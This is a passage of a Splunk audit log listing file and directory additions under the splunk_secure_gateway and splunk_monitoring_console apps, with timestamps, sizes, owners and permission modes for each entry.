uid=41812, modtime="Thu Oct 6 17:31:11 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:12.220, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/alerts/notifications.py", isdir=0, size=3891, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.215, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/alerts/devices.py", isdir=0, size=3193, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.212, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/alerts/device_role_mapping.py", isdir=0, size=5604, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.208, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/alerts/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:11 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:12.204, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/alerts/__init__.py", isdir=0, size=63, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.100, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/migration/migration_script.py", isdir=0, size=7328, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.097, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/migration/__init__.py", isdir=0, size=63, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.093, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/logging/__pycache__/spacebridge_logging.cpython-37.pyc", isdir=0, size=1199, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:12.090, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/logging/__pycache__/setup_logging.cpython-37.pyc", isdir=0, size=11227, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:12.085, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/logging/__pycache__/context_logger.cpython-37.pyc", isdir=0, size=4960, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:12.082, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/logging/__pycache__/__init__.cpython-37.pyc", isdir=0, size=321, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:12.077, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/logging/spacebridge_logging.py", isdir=0, size=1168, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.073, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/logging/setup_logging.py", isdir=0, size=16041, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.069, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/logging/context_logger.py", isdir=0, size=4759, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.065, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/logging/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:12.061, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/logging/__init__.py", isdir=0, size=132, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.957, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/messages/__pycache__/util.cpython-37.pyc", isdir=0, size=1320, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:11.953, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/messages/__pycache__/request_context.cpython-37.pyc", isdir=0, size=2403, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:11.949, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/messages/__pycache__/message_processor.cpython-37.pyc", isdir=0, size=10244, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:11.942, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/messages/__pycache__/message_handler.cpython-37.pyc", isdir=0, size=3714, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:11.937, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/messages/__pycache__/__init__.cpython-37.pyc", isdir=0, size=237, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:11.932, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/messages/util.py", isdir=0, size=1456, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.928, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/messages/send_response.py", isdir=0, size=1927, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.924, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/messages/request_context.py", isdir=0, size=2172, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.920, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/messages/message_processor.py", isdir=0, size=17175, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.916, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/messages/message_handler.py", isdir=0, size=5110, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.912, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/messages/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:11.906, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/messages/__init__.py", isdir=0, size=65, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.800, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/versioning", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.794, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.789, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/users", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:12 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.785, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/udf", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.781, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.777, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/search", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.773, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.770, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.766, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/migration", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.763, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/metrics", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.759, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/messages", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.754, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/logging", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.749, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/exceptions", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.745, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/encryption", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.742, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/data", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.738, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.734, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/alerts", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:11 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.731, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/access", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.728, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:11.724, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.520, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/subscription_subprocess.py", isdir=0, size=2609, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.516, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/ssg_subscription_modular_input.py", isdir=0, size=7423, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.512, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/ssg_subscription_clean_up_modular_input.py", isdir=0, size=2775, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.508, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/ssg_registered_users_list_modular_input.py", isdir=0, size=2644, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.504, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/ssg_mobile_alert.py", isdir=0, size=26249, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.499, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/ssg_metrics_modular_input.py", isdir=0, size=2368, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.494, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/ssg_enable_modular_input.py", isdir=0, size=2660, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.489, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/ssg_device_role_modular_input.py", isdir=0, size=3200, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.485, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/ssg_delete_tokens_modular_input.py", isdir=0, size=6061, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.481, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/ssg_alerts_ttl_modular_input.py", isdir=0, size=3367, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.478, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.473, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/secure_gateway_modular_input.py", isdir=0, size=7434, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.469, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/check_ssg_processes.py", isdir=0, size=2095, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.463, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/check_ssg_mobile_wss.py", isdir=0, size=3538, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.459, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/check_ssg_mobile_https.py", isdir=0, size=2023, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.455, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/check_ssg_mobile_async.py", isdir=0, size=2314, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.451, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.345, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/static/splunk_pony.jpg", isdir=0, size=60691, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:11.342, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/static/multiple_images_icon.png", isdir=0, size=176234, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:11.338, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/static/image_print_sheet.pdf", isdir=0, size=687610, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:11.334, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/static/appLogo_2x.png", isdir=0, size=14288, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:11.331, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/static/appLogo.png", isdir=0, size=5061, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:11.327, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/static/appIcon_3x.png", isdir=0, size=28745, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:11.324, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/static/appIcon_2x.png", isdir=0, size=14288, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:11.320, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/static/appIconAlt_2x.png", isdir=0, size=14288, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:11.316, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/static/appIconAlt.png", isdir=0, size=5061, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:11.313, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/static/appIcon.png", isdir=0, size=5061, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:11.208, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/static", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.204, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.200, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.196, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.193, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.188, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/appserver", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.184, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/app.manifest", isdir=0, size=1683, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:11.178, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/README", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:11.172, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/LICENSE.TXT", isdir=0, size=39508, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:11.068, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/plugins/SplunkOmitAssetsPlugin.js", isdir=0, size=756, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:11.063, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/plugins/SplunkNameModuleIdsPlugin.js", isdir=0, size=1723, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:11.058, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/plugins/SplunkDashboardExtensionOutputPlugin.js", isdir=0, size=1406, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:11.054, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/util/mergeConfigs.test.js", isdir=0, size=1671, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:11.051, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/util/mergeConfigs.js", isdir=0, size=881, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:11.046, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/util/getPathTemplate.js", isdir=0, size=2015, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:11.038, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/util/getNodeModulesPath.js", isdir=0, size=1313, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:11.033, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/util/createBabelLoader.js", isdir=0, size=1573, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:11.029, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/util/collectFilesSync.js", isdir=0, size=922, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.925, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/postcss_plugins/splunk-postcss-theme-import/package.json", isdir=0, size=173, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.921, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/postcss_plugins/splunk-postcss-theme-import/index.js", isdir=0, size=791, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.916, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/postcss_plugins/splunk-postcss-theme-import", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:10.912, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/web_loaders/splunk-public-path-injection-loader.js", isdir=0, size=888, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.908, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/web_loaders/splunk-es6-polyfill-loader.js", isdir=0, size=1382, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.903, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/profiles/common/shared.config.js", isdir=0, size=6329, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.899, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/profiles/common/resolve_loader.config.js", isdir=0, size=490, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.895, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/profiles/common/prod.config.js", isdir=0, size=1145, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.890, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/profiles/common/postcss.config.js", isdir=0, size=4298, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.885, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/profiles/common/namespacedAppPages.config.js", isdir=0, size=2239, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.881, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/profiles/common/liveReload.config.js", isdir=0, size=179, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.874, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/profiles/common/dev.config.js", isdir=0, size=1706, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.870, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/profiles/common/css.config.js", isdir=0, size=1581, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.866, user=n/a, 